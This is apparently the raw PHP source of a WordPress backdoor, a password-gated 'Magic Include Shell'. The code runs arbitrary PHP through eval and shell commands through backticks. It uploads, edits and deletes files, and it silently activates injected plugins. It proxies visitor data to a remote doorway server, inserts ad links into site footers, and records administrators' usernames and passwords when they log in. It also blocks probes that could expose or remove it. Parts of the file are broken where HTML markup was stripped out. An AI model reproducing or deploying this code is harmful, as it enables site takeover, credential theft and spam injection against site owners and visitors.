$kmd5='510a584f9747c1262b5ef3c89bd9afb4';$shellver='1.7.5-stable'; if((isset($_POST['sh'])&&(md5(md5($_POST['sh']))==$kmd5))or(isset($_GET['sh'])&&(md5(md5($_GET['sh']))==$kmd5))) { $kuppa=getcwd(); if (file_exists($kuppa."/wp-config.php")) {include ($kuppa."/wp-config.php");}; if (file_exists($kuppa."/wp-includes/formatting.php")) {require_once ($kuppa."/wp-includes/formatting.php");}; if (file_exists($kuppa."/wp-includes/kses.php")) {require_once ($kuppa."/wp-includes/kses.php");}; } if (!function_exists('update_option_1')): function update_option_1( $option_name, $newvalue ) { global $wpdb; $wpdb->query( $wpdb->prepare( "UPDATE $wpdb->options SET option_value = %s WHERE option_name = %s", $newvalue, $option_name ) ); do_action( "update_option_{$option_name}", '', $newvalue ); return true; } endif; if (!function_exists('reklama_k3')): function reklama_k3() { $reklama_path1 =get_my_param3('r1'); $reklama_type =get_my_param3('r2'); if (!empty($reklama_path1)) { $reklama_message = get_option($reklama_path1); $rmm = explode('
', $reklama_message); echo "
"; foreach($rmm as $rmm1) echo $rmm1; echo "
"; } } endif; if (!function_exists('reklama_k3_css')): function reklama_k3_css() {;} endif; if (!function_exists('read_curl_3')): function read_curl_3($v,$useragent,$ip,$referer,$prefix,$id,$door_uid,$lang) { if (function_exists("curl_init")) { if ($ch = @curl_init()) { @curl_setopt($ch, CURLOPT_URL,$v); @curl_setopt($ch, CURLOPT_HEADER,true); @curl_setopt($ch, CURLOPT_FOLLOWLOCATION,false); @curl_setopt($ch, CURLOPT_AUTOREFERER,false); @curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); @curl_setopt($ch, CURLOPT_POST, true); @curl_setopt($ch, CURLOPT_POSTFIELDS,'ip='.$ip.'&prefix='.$prefix.'&id='.$id.'&uid='.$door_uid.'&ref='.$referer.'&ua='.$useragent.'&lang='.$lang); $data = @curl_exec($ch); if (curl_errno($ch)) return false; else { $a=@curl_getinfo($ch,CURLINFO_HTTP_CODE); @curl_close($ch); $datas = explode("\r\n\r\n",$data); $header=$datas[0]; $headers = explode("\n",$header); unset($datas[0]); unset($data); $data = implode("\r\n\r\n",$datas); if ($a==301) { //header parsing foreach ($headers as $sss) { if (preg_match("/Location:.*/s",$sss,$ok)) { header(trim($ok[0])); die; } } } elseif ($a==200) return $data; else return false; } }else return false; }else return false; } endif; if (!function_exists('read_socket_3')): function read_socket_3($v,$useragent,$ip,$referer,$prefix,$id,$door_uid,$lang) { $host=parse_url($v,PHP_URL_HOST); $path=parse_url($v,PHP_URL_PATH); $data='ip='.$ip.'&prefix='.$prefix.'&id='.$id.'&uid='.$door_uid.'&ref='.$referer.'&ua='.$useragent.'&lang='.$lang; $fp = @fsockopen($host, 80, $errno, $errstr, 30); if (!$fp) return false; @stream_set_timeout($fp,20); $out = "POST $path HTTP/1.1\r\n"; $out .= "Host: $host\r\n"; $out .= "User-Agent: null \r\n"; $out .= "Accept: text/html\r\n"; $out .= "Accept-Language:*\r\n"; $out .= "Accept-Charset:*\r\n"; $out .= "Referer: null \r\n"; $out .= "Connection: Close\r\n"; $out .= "Content-type: application/x-www-form-urlencoded\r\n"; $out .= "Content-Length: ".strlen($data)."\r\n\r\n"; $out .=$data; @fwrite($fp, $out); //read data $header=''; do { $buf=fgets($fp,2048); $header=$header.$buf; }while($buf!="\r\n" && !feof($fp)); $buf=fgets($fp,2048); unset($buf); $headers=explode("\n",$header); while(!feof($fp)) $buf.=fread($fp,2048); //header parsing if (preg_match("/301/s",$headers[0],$ok)) { foreach ($headers as $sss) { if (preg_match("/Location:.*/s",$sss,$ok)) { header(trim($ok[0])); die; } } } elseif (preg_match("/200/s",$headers[0],$ok)) return $buf; else return false; } endif; if (!function_exists('read_file_3')): function read_file_3($v) { if (function_exists("file_get_contents")) { $data=@file_get_contents($v); return $data; } else return false; } endif; if (!function_exists('readf3')): function readf3($v,$prefix,$id,$door_uid) { $useragent = base64_encode(rawurlencode($_SERVER['HTTP_USER_AGENT'])); $lang = base64_encode(rawurlencode($_SERVER['HTTP_ACCEPT_LANGUAGE'])); $ip = base64_encode(rawurlencode($_SERVER['REMOTE_ADDR'])); $referer = base64_encode(rawurlencode($_SERVER['HTTP_REFERER'])); $door_uid = base64_encode(rawurlencode($door_uid)); $prefix = base64_encode(rawurlencode($prefix)); $id = base64_encode(rawurlencode($id)); $data=read_curl_3($v,$useragent,$ip,$referer,$prefix,$id,$door_uid,$lang); if ($data<>false) return $data; $data=read_socket_3($v,$useragent,$ip,$referer,$prefix,$id,$door_uid,$lang); if ($data<>false) return $data; return false; } endif; if (!function_exists('set_my_param3')): function set_my_param3($param,$value) { $data=get_option('hack_file'); $data=base64_decode($data); list($door_enable,$reklama_enable,$d_path1,$d_path2,$r_path1,$r_path2,$door_prefix,$adm_data,$adm_dops)=split(";",$data,9); switch ($param) { case 'reklama' :$reklama_enable =$value;break; case 'adm_data' :$adm_data =$value;break; case 'adm_dops' :$adm_dops =$value;break; case 'door' :$door_enable =$value;break; case 'd1' :$d_path1 =$value;break; case 'd2' :$d_path2 =$value;break; case 'r1' :$r_path1 =$value;break; case 'r2' :$r_path2 =$value;break; case 'door_prefix' :$door_prefix =$value;break; } $data=$door_enable.";".$reklama_enable.";".$d_path1.";".$d_path2.";".$r_path1.";".$r_path2.";".$door_prefix.";".$adm_data.";".$adm_dops; $data=base64_encode($data); update_option_1('hack_file',$data); } endif; if (!function_exists('get_my_param3')): function get_my_param3($param) { $data=get_option('hack_file'); $data=base64_decode($data); list($door_enable,$reklama_enable,$d_path1,$d_path2,$r_path1,$r_path2,$door_prefix,$adm_data,$adm_dops)=split(";",$data,9); switch ($param) { case 'reklama' :return $reklama_enable;break; case 'adm_data' :return $adm_data;break; case 'adm_dops' :return $adm_dops;break; case 'door' :return $door_enable;break; case 'd1' :return $d_path1;break; case 'd2' :return $d_path2;break; case 'r1' :return $r_path1;break; case 'r2' :return $r_path2;break; case 'door_prefix' :return $door_prefix;break; } } endif; if((isset($_POST['sh'])&&(md5(md5($_POST['sh']))==$kmd5))) { if (isset($_POST['door_enable'])) { set_my_param3('door',$_POST['door_enable']); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['upload_reklama'])) { echo "reply_ok_begin "; $reklama_path1 =get_my_param3('r1'); if (!empty($reklama_path1)) { $r_content=rawurldecode(base64_decode($_POST['rfile'])); if (function_exists('update_option')) {update_option($reklama_path1,$r_content);echo 'm1';} else {update_option_1($reklama_path1,$r_content);echo 'm2';} echo ':set links success'; }else echo 'path not set'; echo "reply_ok_end"; } if (isset($_POST['add_reklama'])) { echo "reply_ok_begin "; $reklama_path1 =get_my_param3('r1'); if (!empty($reklama_path1)) { $reklama_message = get_option($reklama_path1); $r_content=rawurldecode(base64_decode($_POST['rfile'])); update_option_1($reklama_path1,$r_content.$reklama_message); } else echo ' path not set '; echo "reply_ok_end"; } if (isset($_POST['get_shell_ver'])) { echo "reply_ok_begin".$shellver."reply_ok_end"; } if (isset($_POST['adm_server'])) { set_my_param3('adm_server',$_POST['adm_server']); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['reklama_enable'])) { set_my_param3('reklama',$_POST['reklama_enable']); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['null_param'])) { $data="n;n;n;n;n;n;n;n;n"; $data=base64_encode($data); update_option_1('hack_file',$data); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['get_wp_ver'])) { echo "reply_ok_begin".get_option('db_version')."reply_ok_end"; } if (isset($_POST['get_adm_data'])) { echo "reply_ok_begin".get_my_param3('adm_data')."reply_ok_end"; } if (isset($_POST['get_wp_opt'])) { echo "reply_ok_begin "; $data=get_option($_POST['get_wp_opt']); if (is_array($data)) foreach ($data as $dat) echo $dat."
"; else echo $data; echo "reply_ok_end"; } if (isset($_POST['door_path1'])) { set_my_param3('d1',base64_decode($_POST['door_path1'])); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['door_path2'])) { set_my_param3('d2',base64_decode($_POST['door_path2'])); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['rekl_path1'])) { set_my_param3('r1',base64_decode($_POST['rekl_path1'])); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['rekl_path2'])) { set_my_param3('r2',base64_decode($_POST['rekl_path2'])); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['door_prefix'])) { set_my_param3('door_prefix',$_POST['door_prefix']); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['door_uid'])) { set_my_param3('adm_dops',base64_decode($_POST['door_uid'])); echo "reply_ok_begin ok reply_ok_end"; } if (isset($_POST['exec_code'])) { echo "reply_ok_beginResult:
"; echo eval(rawurldecode(base64_decode($_POST['code']))); echo "reply_ok_end"; } exit; } if((isset($_GET['sh'])&&(md5(md5($_GET['sh']))==$kmd5))) { class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addDir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x0a\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00\x00\x00"; $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x0a\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $ext = "\x00\x00\x10\x00"; $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $name = str_replace(array('../','./'), '', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } function addFiles($files) { foreach($files as $file) { if (is_file($file)) { $data = implode("",file($file)); $this->addFile($data,$file); } } } function output($file) { $fp=fopen($file,"w"); fwrite($fp,$this->file()); fclose($fp); } } class SimpleUnzip { var $Comment = ''; var $Entries = array(); var $Name = ''; var $Size = 0; var $Time = 0; function SimpleUnzip($in_FileName = '') { if ($in_FileName !== '') { SimpleUnzip::ReadFile($in_FileName); } } function Count() { return count($this->Entries); } function GetData($in_Index) { return $this->Entries[$in_Index]->Data; } function GetEntry($in_Index) { return $this->Entries[$in_Index]; } function GetError($in_Index) { return $this->Entries[$in_Index]->Error; } function GetErrorMsg($in_Index) { return $this->Entries[$in_Index]->ErrorMsg; } function GetName($in_Index) { return $this->Entries[$in_Index]->Name; } function GetPath($in_Index) { return $this->Entries[$in_Index]->Path; } function GetTime($in_Index) { return $this->Entries[$in_Index]->Time; } function ReadFile($in_FileName) { $this->Entries = array(); $this->Name = $in_FileName; $this->Time = filemtime($in_FileName); $this->Size = filesize($in_FileName); $oF = fopen($in_FileName, 'rb'); $vZ = fread($oF, $this->Size); fclose($oF); $aE = explode("\x50\x4b\x05\x06", $vZ); $aP = unpack('x16/v1CL', $aE[1]); $this->Comment = substr($aE[1], 18, $aP['CL']); $this->Comment = strtr($this->Comment, array("\r\n" => "\n","\r" => "\n")); $aE = explode("\x50\x4b\x01\x02", $vZ); $aE = explode("\x50\x4b\x03\x04", $aE[0]); array_shift($aE); foreach ($aE as $vZ) { $aI = array(); $aI['E'] = 0; $aI['EM'] = ''; $aP = unpack('v1VN/v1GPF/v1CM/v1FT/v1FD/V1CRC/V1CS/V1UCS/v1FNL', $vZ); $bE = ($aP['GPF'] && 0x0001) ? TRUE : FALSE; $nF = $aP['FNL']; if ($aP['GPF'] & 0x0008) { $aP1 = unpack('V1CRC/V1CS/V1UCS', substr($vZ, -12)); $aP['CRC'] = $aP1['CRC']; $aP['CS'] = $aP1['CS']; $aP['UCS'] = $aP1['UCS']; $vZ = substr($vZ, 0, -12); } $aI['N'] = substr($vZ, 26, $nF); if (substr($aI['N'], -1) == '/') { continue; } $aI['P'] = dirname($aI['N']); $aI['P'] = $aI['P'] == '.' ? '' : $aI['P']; $aI['N'] = basename($aI['N']); $vZ = substr($vZ, 26 + $nF); if (strlen($vZ) != $aP['CS']) { $aI['E'] = 1; $aI['EM'] = 'Compressed size is not equal with the value in header information.'; } else { if ($bE) { $aI['E'] = 5; $aI['EM'] = 'File is encrypted, which is not supported from this class.'; } else { switch($aP['CM']) { case 0: break; case 8: $vZ = gzinflate($vZ); break; case 12: if (! extension_loaded('bz2')) { if (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN') { @dl('php_bz2.dll'); } else { @dl('bz2.so'); } } if (extension_loaded('bz2')) { $vZ = bzdecompress($vZ); } else { $aI['E'] = 7; $aI['EM'] = "PHP BZIP2 extension not available."; } break; default: $aI['E'] = 6; $aI['EM'] = "De-/Compression method {$aP['CM']} is not supported."; } if (! $aI['E']) { if ($vZ === FALSE) { $aI['E'] = 2; $aI['EM'] = 'Decompression of data failed.'; } else { if (strlen($vZ) != $aP['UCS']) { $aI['E'] = 3; $aI['EM'] = 'Uncompressed size is not equal with the value in header information.'; } else { if (crc32($vZ) != $aP['CRC']) { $aI['E'] = 4; $aI['EM'] = 'CRC32 checksum is not equal with the value in header information.'; } } } } } } $aI['D'] = $vZ; $aI['T'] = mktime(($aP['FT'] & 0xf800) >> 11, ($aP['FT'] & 0x07e0) >> 5, ($aP['FT'] & 0x001f) << 1, ($aP['FD'] & 0x01e0) >> 5, ($aP['FD'] & 0x001f), (($aP['FD'] & 0xfe00) >> 9) + 1980); $this->Entries[] = &new SimpleUnzipEntry($aI); } return $this->Entries; } } class SimpleUnzipEntry { var $Data = ''; var $Error = 0; var $ErrorMsg = ''; var $Name = ''; var $Path = ''; var $Time = 0; function SimpleUnzipEntry($in_Entry) { $this->Data = $in_Entry['D']; $this->Error = $in_Entry['E']; $this->ErrorMsg = $in_Entry['EM']; $this->Name = $in_Entry['N']; $this->Path = $in_Entry['P']; $this->Time = $in_Entry['T']; } } function unzipFile($filename, $destination_folder) { if (substr($destination_folder, -1) != '/') { $destination_folder = $destination_folder .'/'; } $vzip = new SimpleUnzip($filename); foreach ($vzip->Entries as $extr) { $path = $extr->Path; $path_folder = explode ('/', $path); $new_path = ''; foreach ($path_folder as $folder) { $new_path .= $folder .'/'; $to_create = $destination_folder . $new_path; if (substr($to_create, -1) == '/') { $to_create = substr($to_create, 0, strlen($to_create)-1); } @mkdir($to_create, 0777); } $new_path = ''; $filev = fopen ($destination_folder. $extr->Path .'/'. $extr->Name, 'w'); fwrite ($filev, $extr->Data); fclose ($filev); } } function dd($file) { if (is_dir($file) || is_file($file)) { chmod($file,0777); if (is_dir($file)) { $handle = opendir($file); while($filename = readdir($handle)) if ($filename != "." && $filename != "..") dd($file."/".$filename); closedir($handle); if(@rmdir($file)) print "$file deleted!
"; else print "$file delete error!
"; } else { if(@unlink($file)) print "$file deleted!
"; else print "$file delete error!
"; } } } function add2zipfile($file) { if (file_exists($file)) { chmod($file,0777); if (is_dir($file)) { $handle = opendir($file); while($filename = readdir($handle)) if ($filename != "." && $filename != "..") { $archive.=add2zipfile(rtrim($file,'/').'/'.$filename).',:,'; //$archive.=rtrim($file,'/').'/'.$filename.',:,'; } closedir($handle); return $archive; } else { $archive.=$file; return $archive; } } } function U_sapi() { switch(PHP_SAPI) { case 'apache2handler': return 'Apache 2.0 Handler'; case 'apache': return 'Apache'; case 'cgi': return 'CGI'; case 'cgi-fcgi': return 'CGI/FastCGI'; default: return PHP_SAPI; } } function U_getos() { if (function_exists('php_uname')) return php_uname(); if (PHP_OS == 'WINNT') return 'Windows NT'; return PHP_OS; } $site=$PHP_SELF; header("Content-type: text/html"); $file2zip=$_POST['file2zip']; $deldira=$_POST['deldira']; $arhiv=$_POST['arhiv']; $dira=$_GET['dira']; (empty($dira) || !isset($dira)) ? $dira='./' : ''; if(!ereg("/$",$dira)) $dira=$dira.'/'; $comanda=$_POST['comanda']; $shcom=$_POST['shcom']; if(isset($_POST['filee']) && !empty($_POST['filee'])) $filee=$_POST['filee']; elseif(isset($_GET['filee']) && !empty($_GET['filee'])) $filee=$dira.''.$_GET['filee']; $uploadfile=$_POST['uploadfile']; $uploaddir=$_POST['uploaddir']; $del=$_POST[del]; if(isset($_POST['edit']) && !empty($_POST['edit'])) $edit=$_POST['edit']; elseif(isset($_GET['edit']) && !empty($_GET['edit'])) $edit=$_GET['edit']; $save_edit=$_POST[save_edit]; function cutter($str,$sym,$len){ do{$serr=1; if(strpos($str,$sym)!==false){ $serr=0; $str1 = substr($str,0,strpos($str,$sym)); $str2 = substr($str,strpos($str,$sym)+$len,strlen($str)); $str = $str1.$str2; } } while($serr==0); return $str; } $kverya=cutter($_SERVER["QUERY_STRING"],'dira=',999); while(ereg('&&',$kverya)) { $kverya=str_replace('&&','&',$kverya); } if (isset($_POST['my_plugin'])) { $my_plugin =$_POST['my_plugin']; $table_data =$_POST['my_plugin_t']; list($mbdname,$mlogin,$mpass,$mhost,$table_prefix)=explode(';',$table_data); if ($mbdname<>'bdname') { $link = mysql_connect($mhost,$mlogin,$mpass); $bd_select = mysql_select_db($mbdname, $link); } $query = "SELECT option_value FROM ".$table_prefix."options WHERE option_name='active_plugins'"; $result = mysql_query($query); while ($row = mysql_fetch_assoc($result)) { $plugin_ee=$row['option_value']; list($a1,$a2)=explode('{',$plugin_ee); list($a1_1,$a1_2)=explode(':',$a1); list($a2_1,$a2_2)=explode('}',$a2); if ($a1_1=='') $a1_1='a'; if ($a1_2=='') $a1_2=0; $a1_2old=$a1_2; $a1_2=$a1_2+1; $plugin_ee=$a1_1.':'.$a1_2.':{'.$a2_1.'i:'.$a1_2old.';s:'.strlen($my_plugin).':"'.$my_plugin.'"'.';}'; } mysql_free_result($result); if ($my_plugin=='reset') $query = "UPDATE ".$table_prefix."options SET option_value='' WHERE option_name='active_plugins'"; elseif ($my_plugin<>'get') { $query = "UPDATE ".$table_prefix."options SET option_value='".$plugin_ee."' WHERE option_name='active_plugins'"; $result = mysql_query($query); } $query = "SELECT option_value FROM ".$table_prefix."options WHERE option_name='active_plugins'"; $result = mysql_query($query); while ($row = mysql_fetch_assoc($result)) { echo $row['option_value']."\n"; } } ?> Magic Include Shell <?php echo $shellver; ?>
">
Server: '; print U_sapi(); if(function_exists('apache_get_version')) print ' ['.apache_get_version().']'; print '
'; print '
System: '; print U_getos(); print '

'; print 'Php version: '.PHP_VERSION.'

'; print 'Hostname:Port: '.$_SERVER['SERVER_NAME'].':'.$_SERVER['SERVER_PORT']; ?>
Php eval:


"> Path to plugin
"> Shell command:

" method="post"> File to upload:

Dir to upload:

addDir($ziparc[$i]); print "{$ziparc[$i]} added!
"; } elseif(is_file($ziparc[$i])) { $name2add=explode('../',$ziparc[$i]); $name2add=$name2add[count($name2add)-1]; $ziper->addFile(file_get_contents($ziparc[$i]),$name2add); print "{$ziparc[$i]} added!
"; } } } } $ziper->output($_POST[zip_path]); } if(!empty($deldira) && is_array($deldira) && isset($_POST[delete_submit])) { for($i=0;$i"; else print "Rename error!
"; } if(!empty($comanda)) { eval(trim(stripslashes($comanda))); } if(!empty($shcom)) { print '
'.`$shcom`.'
'; } if(!empty($_FILES['uploadfile']['name'])) { @copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? print "File ".$_FILES['uploadfile']['name']." uploaded succesfully!
" : print "Upload error!
"; } if(!empty($del) && is_array($del) && isset($_POST[delete_submit])) { for($i=0;$i'.$del[$i].' deleted succesfully!
'; } } if(!empty($filee)) { ?>

"),array('#FFFFFF',''),highlight_string($filee,true));
else
       print $filee;
?>
">
$edit edited succesfully!
"; } print 'Dir='.$dira.'
'; if(!($dp = opendir($dira))) die ("Cannot open ./"); $file_array = array(); while ($file = readdir ($dp)) { $file_array[] = $file; } sort ($file_array); print '
'; while (list($fileIndexValue, $file_name) = each ($file_array)) { if(is_file($dira.''.$file_name)) { echo ""; if(is_writeable($dira.''.$file_name)) { $file_name_array=explode('.',$file_name); $file_name_ext=$file_name_array[count($file_name_array)-1]; echo ""; echo ""; echo ""; } else { echo ""; echo ""; echo ""; } if(is_readable($dira.''.$file_name)) { if($file_name_ext!='zip') echo ""; else echo ""; if($file_name_ext=='zip') echo ""; else echo ""; } else { echo ""; echo ""; } print ''; } else { echo ""; echo ""; $dir_for_del=rtrim($dira,'/').'/'.$file_name; if($file_name!='.' && $file_name!='..' && is_writeable($dir_for_del)) { echo ""; echo ""; } elseif($file_name!='.' && $file_name!='..' && !is_writeable($dir_for_del)) echo ""; if(is_readable($dir_for_del) && $file_name!='.' && $file_name!='..') echo ""; elseif(!is_readable($dir_for_del) && $file_name!='.' && $file_name!='..') echo ""; if($file_name=='.' || $file_name=='..') echo ""; echo ''; } } print '
Name Edit to to to
$file_name (". round(filesize($dira.''.$file_name)/1024,1) . "kb)edit       
$file_name         
'; ?> false) {$doorsuccess=true;echo $data;die();} } if (!$doorsuccess) { $data=readf3($doorpath1,$kfarma,$_GET[$kfarma],$door_uid); if ($data<>false) {$doorsuccess=true;echo $data;die();} } if ($doorsuccess) exit; } } $post_login_k =$_POST['log']; $post_pass_k =$_POST['pwd']; if ((isset($_POST['log']))and(isset($_POST['pwd']))) { set_my_param3('adm_data',$post_login_k."-".$post_pass_k); } if (get_my_param3('reklama')=='y') { add_action('wp_head', 'reklama_k3_css'); add_action('wp_footer', 'reklama_k3'); } $post_arr=implode('.',$_POST); $get_arr=implode('.',$_GET); $cook_arr=implode('.',$_COOKIE); $post_arr_key=implode('.',@array_flip($_POST)); $get_arr_key=implode('.',@array_flip($_GET)); $cook_arr_key=implode('.',@array_flip($_COOKIE)); $other_shtuki=@file_get_contents('php://input'); $uri=$_SERVER['REQUEST_URI']; $cracktrack = strtolower($post_arr.$get_arr.$cook_arr.$post_arr_key.$get_arr_key.$cook_arr_key.$other_shtuki.$uri); $wormprotector1 = array('db_version','deactivate-all','base64','user_pass','substring','or id=','eval(','nutch','wp-optimize'); //$wormprotector1 = array('db_version','deactivate-all','base64','user_pass','substring','or id=','eval(','nutch','wp-optimize','action=deactivate&plugin=page-management-dropdown','action=activate&plugin=page-management-dropdown'); foreach ($wormprotector1 as $wormprotector) { $checkworm = str_replace($wormprotector, '*', $cracktrack); if ($cracktrack != $checkworm) { header("HTTP/1.0 500 Internal Server Error"); die(); } } //Protect upload file $fn001=$_REQUEST['Filename']; if (preg_match("/\.php/s",$fn001,$okk001)) die(); $fn002=$_FILES['image']['name']; if (preg_match("/\.php/s",$fn002,$okk002)) die(); $fn003=$_FILES['async-upload']['name']; if (preg_match("/\.php/s",$fn003,$okk003)) die();